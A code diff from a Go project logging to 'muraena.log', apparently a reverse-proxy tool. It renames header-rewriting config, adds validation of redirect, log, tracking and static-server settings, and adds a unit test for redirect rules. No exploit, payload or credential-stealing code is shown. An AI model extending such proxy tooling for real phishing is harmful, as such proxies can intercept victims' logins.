"msp", "nitf", "ota", "pbm", "pc1", "pc2", "pc3", "pcf", "pcx", "pdn", "pgm", "PI1", "PI2", "PI3", "pict",
@ -355,23 +413,24 @@ func (s *Session) GetConfiguration() (err error) {
"pcx", "pgf", "sgi", "rgb", "rgba", "bw", "int", "inta", "sid", "ras", "sun", "tga"}
// Fix Craft config
slice := s.Config.Craft.Add.Response.Headers
for s, header := range s.Config.Craft.Add.Response.Headers {
slice := s.Config.Transform.Response.Add.Headers
for s, header := range s.Config.Transform.Response.Add.Headers {
if header.Name == "" {
slice = append(slice[:s], slice[s+1:]...)
}
}
s.Config.Craft.Add.Response.Headers = slice
s.Config.Transform.Response.Add.Headers = slice
slice = s.Config.Craft.Add.Request.Headers
for s, header := range s.Config.Craft.Add.Request.Headers {
slice = s.Config.Transform.Request.Add.Headers
for s, header := range s.Config.Transform.Request.Add.Headers {
if header.Name == "" {
slice = append(slice[:s], slice[s+1:]...)
}
}
s.Config.Craft.Add.Request.Headers = slice
s.Config.Transform.Request.Add.Headers = slice
return
// Final Checks
return s.DoChecks()
}
func (s *Session) UpdateConfiguration(domains *[]string) (err error) {
@ -381,7 +440,7 @@ func (s *Session) UpdateConfiguration(domains *[]string) (err error) {
// Update config
//
// Disable crawler and update external domains
config.Crawler.ExternalOrigins = *domains
config.Origins.ExternalOrigins = *domains
config.Crawler.Enabled = false
// Update TLS accordingly
@ -398,3 +457,101 @@ func (s *Session) UpdateConfiguration(domains *[]string) (err error) {
return ioutil.WriteFile(*s.Options.ConfigFilePath, newConf, 0644)
}
func (s *Session) DoChecks() (err error) {
// Check Redirect
s.CheckRedirect()
// Check Log
err = s.CheckLog()
if err != nil {
return
}
// Check Tracking
err = s.CheckTracking()
if err != nil {
return
}
// Check Static Server
err = s.CheckStaticServer()
if err != nil {
return
}
return
}
// CheckRedirect checks the redirect rules and removes invalid ones.
func (s *Session) CheckRedirect() {
var redirects []Redirect
for _, drop := range s.Config.Redirects {
if drop.RedirectTo == "" {
continue
}
if drop.Hostname == "" && drop.Path == "" && drop.Query == "" {
continue
}
// Unset HTTPStatusCode will default to 302
if drop.HTTPStatusCode == 0 {
drop.HTTPStatusCode = 302
}
redirects = append(redirects, drop)
}
s.Config.Redirects = redirects
}
// CheckLog checks the log configuration and disables it if the file is not accessible.
func (s *Session) CheckLog() (err error) {
if !s.Config.Log.Enabled {
return
}
if s.Config.Log.FilePath == "" {
s.Config.Log.FilePath = "muraena.log"
}
// If the file doesn't exist, create it, or append to the file
f, err := os.OpenFile(s.Config.Log.FilePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
s.Config.Log.Enabled = false
return errors.New(fmt.Sprintf("Error opening log file %s: %s", s.Config.Log.FilePath, err))
}
defer f.Close()
return
}
// CheckTracking checks the tracking configuration and disables it if the file is not accessible.
func (s *Session) CheckTracking() (err error) {
if !s.Config.Tracking.Enabled {
return
}
return
}
// CheckStaticServer checks the static server configuration and disables it if the file is not accessible.
func (s *Session) CheckStaticServer() (err error) {
if !s.Config.StaticServer.Enabled {
return
}
if s.Config.StaticServer.LocalPath == "" {
s.Config.StaticServer.Enabled = false
return errors.New(fmt.Sprintf("Error opening static server local path %s: %s", s.Config.StaticServer.LocalPath, err))
}
if s.Config.StaticServer.URLPath == "" {
s.Config.StaticServer.Enabled = false
return errors.New(fmt.Sprintf("Error opening static server URL path %s: %s", s.Config.StaticServer.URLPath, err))
}
return
}

59
session/config_test.go Normal file
View file

@ -0,0 +1,59 @@
package session
import (
"testing"
)
func TestSession_CheckRedirect(t *testing.T) {
s := &Session{}
s.Config = &Configuration{}
// INVALID REDIRECTS
r := []Redirect{
{RedirectTo: "example.com", HTTPStatusCode: 200},
}
s.Config.Redirects = r
s.CheckRedirect()
if len(s.Config.Redirects) != 0 {
t.Errorf("Expected %d, got %d", len(r), len(s.Config.Redirects))
}
// VALID REDIRECTS
r = []Redirect{
{Hostname: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Path: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Path: "TEST", Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Path: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Path: "TEST", Query: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200},
{Hostname: "TEST", Path: "TEST", Query: "TEST", RedirectTo: "example.com"},
}
s.Config.Redirects = r
s.CheckRedirect()
if len(s.Config.Redirects) != len(r) {
t.Errorf("Expected %d, got %d", len(r), len(s.Config.Redirects))
}
// MIX REDIRECTS
r = []Redirect{
{Hostname: "TEST", RedirectTo: "example.com", HTTPStatusCode: 200}, // VALID
{RedirectTo: "example.com", HTTPStatusCode: 200}, // INVALID
{Hostname: "TEST", Path: "TEST", Query: "TEST", RedirectTo: "example.com"}, // VALID
}
s.Config.Redirects = r
s.CheckRedirect()
// Expect length to be 2
if len(s.Config.Redirects) != 2 {
t.Errorf("Expected %d, got %d", 2, len(s.Config.Redirects))
}
// Expect last element to have HTTPStatusCode 302
if s.Config.Redirects[1].HTTPStatusCode != 302 {
t.Errorf("Expected %d, got %d", 302, s.Config.Redirects[1].HTTPStatusCode)
}
}

View file

@ -10,10 +10,9 @@ import (
)
var (
host = "127.0.0.1"
port = 6379
password = ""
host = "127.0.0.1"
port = 6379
password = ""
RedisPool *redis.Pool
)

View file

@ -16,9 +16,9 @@ type Module interface {
}
type SessionModule struct {
Session *Session
Name string
tag string
Session *Session `toml:"-"`
Name string `toml:"-"`
tag string `toml:"-"`
}
func AsTag(name string) string {
@ -68,6 +68,6 @@ func (m *SessionModule) Raw(format string, args ...interface{}) {
}
// NO Fatal() here, we want to keep the session alive
//func (m *SessionModule) Fatal(format string, args ...interface{}) {
// func (m *SessionModule) Fatal(format string, args ...interface{}) {
// log.Fatal(m.tag+format, args...)
//}
// }

View file

@ -20,8 +20,10 @@ var tlsRenegotiationToConst = map[string]tls.RenegotiationSupport{
func (s *Session) GetTLSClientConfig() *tls.Config {
cTLS := s.Config.TLS
return &tls.Config{
MinVersion: tlsVersionToConst[cTLS.MinVersion],
MaxVersion: tlsVersionToConst[cTLS.MaxVersion],
PreferServerCipherSuites: cTLS.PreferServerCipherSuites,
SessionTicketsDisabled: cTLS.SessionTicketsDisabled,
NextProtos: []string{"http/1.1"},